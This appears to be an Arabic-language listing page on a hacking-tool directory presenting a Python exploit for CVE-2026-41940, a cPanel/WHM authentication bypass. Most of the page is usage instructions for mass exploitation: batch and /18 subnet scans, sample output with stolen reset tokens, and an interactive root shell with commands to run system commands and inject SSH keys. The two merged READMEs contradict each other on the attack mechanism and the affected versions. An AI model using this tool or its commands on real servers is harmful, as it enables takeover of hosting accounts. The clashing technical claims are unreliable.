Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — CVE-2026-41940 — تجاوز المصادقة في cPanel/WHM بواسطة Dr.Anach، حقن CRLF في معالج المصادقة الأساسي `cpsrvd` → وصول غير مُصادَق إلى واجهة برمجة تطبيقات WHM → تنفيذ تعليمات برمجية عن بُعد (RCE) كجذر. جميع إصدارات cPanel منذ v11.40 متأثرة. | Kitploit
أدوات/GitHubGitHub/anach-ai/cve-2026-41940
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubanach-ai/cve-2026-41940
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940

CVE-2026-41940 — تجاوز المصادقة في cPanel/WHM بواسطة Dr.Anach، حقن CRLF في معالج المصادقة الأساسي `cpsrvd` → وصول غير مُصادَق إلى واجهة برمجة تطبيقات WHM → تنفيذ تعليمات برمجية عن بُعد (RCE) كجذر. جميع إصدارات cPanel منذ v11.40 متأثرة.

عرض المستودع

CVE-2026-41940 — تجاوز المصادقة في cPanel/WHM

المؤلف: Dr.Anach | جهة الاتصال: @dranach | الترخيص: MIT


نظرة عامة

حقن CRLF في معالج المصادقة الأساسية لـ cpsrvd → وصول غير مصادق إلى واجهة API لـ WHM → تنفيذ تعليمات برمجية كجذر (RCE). جميع إصدارات cPanel منذ v11.40 متأثرة.

سلسلة الهجوم

#الخطوةالطلب
1إنشاء جلسةGET /login/?user=root
2حقن CRLFAuthorization: Basic <base64> — كلمة المرور تحمل حمولة \r\n
3ترقية ذاكرة التخزين المؤقتGET /cpsess<ID>/login/?login_only=1
4تنفيذGET /cpsess<ID>/execute/API/func

التثبيت

root@kitploit:~
pip install requests colorama

فيما يلي ملف README.md النهائي — سهل الاستخدام، عملي، ومركز على إنجاز العمل.


أداة اختراق تجاوز المصادقة في cPanel — CVE-2026-41940

المؤلف: Dr.Anach · تيليغرام: @dranach
الإصدار: 2.0.0
الترخيص: لاختبارات الأمن المصرح بها فقط


ما الذي يفعله هذا

يستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel & WHM (الإصدارات 11.x حتى 106.x). تسمح الثغرة لمهاجم غير مصادق بالوصول إلى نقاط النهاية المقيدة — بما في ذلك وظيفة إعادة تعيين كلمة المرور — عن طريق إرسال رأس Host معد يشير إلى خادم يتحكم فيه المهاجم.

يأتي بثلاثة أوضاع:

الوضعالعلامةالوصف
هدف فردي-tاختبار IP أو نطاق واحد

التثبيت

المتطلبات

  • بايثون 3.7+ (تم اختباره على ويندوز، لينكس، ماك)
  • مكتبة requests
root@kitploit:~
pip install requests

لا تبعيات أخرى. يستخدم توسيع CIDR وحدة ipaddress المدمجة في بايثون — لا حاجة لتثبيت أي شيء إضافي على ويندوز.


البداية السريعة

اختبار هدف واحد

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

اختبار قائمة من الأهداف (واحد لكل سطر)

root@kitploit:~
python main.py --batch targets.txt --threads 50

تنسيق targets.txt:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

فحص شبكة فرعية كاملة (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

يوسع هذا 192.168.128.0/18 (16,384 عنوان IP)، ويجري فحص سريع للمنفذ على كل منها، ويحاول الاستغلال فقط ضد المضيفين حيث يكون المنفذ 2087 (cPanel/WHM) مفتوحًا.


الخيارات الكاملة

root@kitploit:~
  -t, --target        Single target IP or domain
  --batch FILE        File with targets (one per line)
  --port-scan CIDR    CIDR range to scan (e.g., 192.168.128.0/18)
  -p, --port          Target port (default: 2087)
  --ssl               Use HTTPS (default: HTTP)
  --timeout SEC       Connection timeout in seconds (default: 10)
  --threads N         Max concurrent threads (default: 50)
  --proxy PROXY       HTTP proxy (e.g., http://127.0.0.1:8080)
  -v, --verbose       Verbose output with debug info
  --no-banner         Suppress banner
  --version           Show version

فهم المخرجات

root@kitploit:~
[+] 192.168.130.45:2087 — VULNERABLE!
    → Password reset URL: http://192.168.130.45:2087/reset?token=abc123
    → Response time: 1.23s

[-] 192.168.131.10:2087 — Not vulnerable
    → Reason: No password reset endpoint found

[!] 192.168.129.22:2087 — Error: Connection refused

النتائج المحفوظة بصيغة JSON منظمة لكل مضيف مع حالة الثغرة، الرموز المستخرجة، وتفاصيل الاستجابة الأولية.


مثال عملي: فحص شبكة /18 على ويندوز

السيناريو الذي ربما تكون هنا من أجله:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

كيف يعمل:

  1. يوسع 192.168.128.0/18 → 16,384 عنوان IP داخليًا
  2. يقوم بالتصفية المسبقة بفحص اتصال TCP سريع على المنفذ 2087 (يتخطى المضيفين الميتين)
  3. يستغل المضيفين الذين لديهم منفذ مفتوح فقط
  4. يبلغ عن المضيفين المعرضين للخطر مع الرموز المستخرجة لإعادة التعيين

نصائح حول تعدد المواضيع:

  • --threads 100 يعمل جيدًا (يحترم حدود المقبس الافتراضية)
  • للفحص الأسرع على اتصالات جيدة: --threads 200
  • إذا واجهت حدًا للمعدل: اخفض إلى --threads 30 وزد --timeout

CVSS والمخاطر

CVSS 9.1 (حرج) — لا يتطلب مصادقة، لا تفاعل مستخدم، تعقيد منخفض.

التأثير

  • إعادة تعيين غير مصرح بها لكلمة المرور لأي حساب cPanel
  • السيطرة الكاملة على الحساب
  • تصعيد الامتيازات من محدود إلى مشرف في بعض التهيئات

الإصلاح

  • تحديث cPanel/WHM إلى أحدث إصدار مصحح
  • التحقق من رؤوس Host من جانب الخادم
  • تقييد الوصول إلى WHM حسب IP حيثما أمكن

قانوني

هذه الأداة مخصصة لتقييمات الأمن المصرح بها فقط. يجب أن تملك الأهداف أو أن تحصل على إذن كتابي من المالك قبل الاختبار. المؤلفون لا يتحملون أي مسؤولية عن سوء الاستخدام.

أوامر الصدفة التفاعلية

root@kitploit:~
help       Show commands
info       Server info
passwd     Change password
accounts   List cPanel accounts
enum       Full enumeration
shell      Execute system command
ssh-add    Inject SSH key
exec       Run Python one-liner
exit       Exit

الكشف

التحقق من ملفات الجلسة:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

السجلات المشبوهة في /usr/local/cpanel/logs/access_log:

root@kitploit:~
/login/?user=root        → session mint
/login/?user=root        → CRLF injection
/cpsess*/login/?login_only=1  → cache promotion
/cpsess*/execute/*       → API abuse

التخفيف

root@kitploit:~
# 1. Patch to fixed build
# 2. Rotate all passwords and SSH keys
# 3. Purge sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

الإسناد

  • الثغرة: Sina Kheirkhah / watchTowr Labs
  • الإطار: Dr.Anach (@dranach)
تنزيل الأداة
ملف دفعي
--batch
تحميل قائمة أهداف من ملف
فحص CIDR--port-scanتوسيع شبكة فرعية واختبار كل مضيف نشط